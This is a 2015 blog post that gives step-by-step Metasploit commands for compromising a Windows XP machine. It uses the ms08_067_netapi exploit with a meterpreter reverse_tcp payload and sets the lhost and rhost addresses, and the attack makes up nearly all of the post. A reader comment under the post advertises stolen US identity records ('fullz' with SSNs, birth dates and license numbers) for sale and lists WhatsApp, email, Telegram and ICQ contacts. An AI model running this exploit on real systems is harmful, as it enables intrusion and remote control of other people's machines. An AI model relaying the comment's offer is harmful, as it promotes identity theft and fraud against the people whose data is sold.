Saturday, 30 May 2015

Hacking Windows xp using Metasploit

Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.


Requirements
  • Kali Linux
  • Windows XP Machine (Target)
Open Your Kali Linux terminal and Type msfconsole hit enter



After getting msfconsole type search netapi hit enter


Now type use exploit/windows/smb/ms08_067_netapi hit enter


now set payload for setting payload type set payload windows/meterpreter/reverse_tcp



now set the required argument by typing show options


for this exploit you have to set the two arguments which is lhost and rhost lhost means local ip address and rhost means our target ip address for local ip address type ifconfig in  new terminal  and for rhost type ipconfig in cmd as follow 





now type set rhost 192.168.65.131 in msfconsole and hit enter

after setting rhost now set the lhost type set lhost 192.168.65.128 hit enter

now the last command is exploit for atttacking our target type exploit after typing exploit if exploit succeed then only our payload will run and meterpreter will be in our hand... ☺ ☺ ☺



1 comment:

  1. Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.

    **PRICE FOR ONE LEAD/FULLZ 2$**

    All SSN's are Tested & Verified. Fresh spammed data.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    ->Bulk order negotiable
    ->Minimum buy 25 to 30 leads/fullz
    ->Hope for the long term business
    ->You can asked for specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete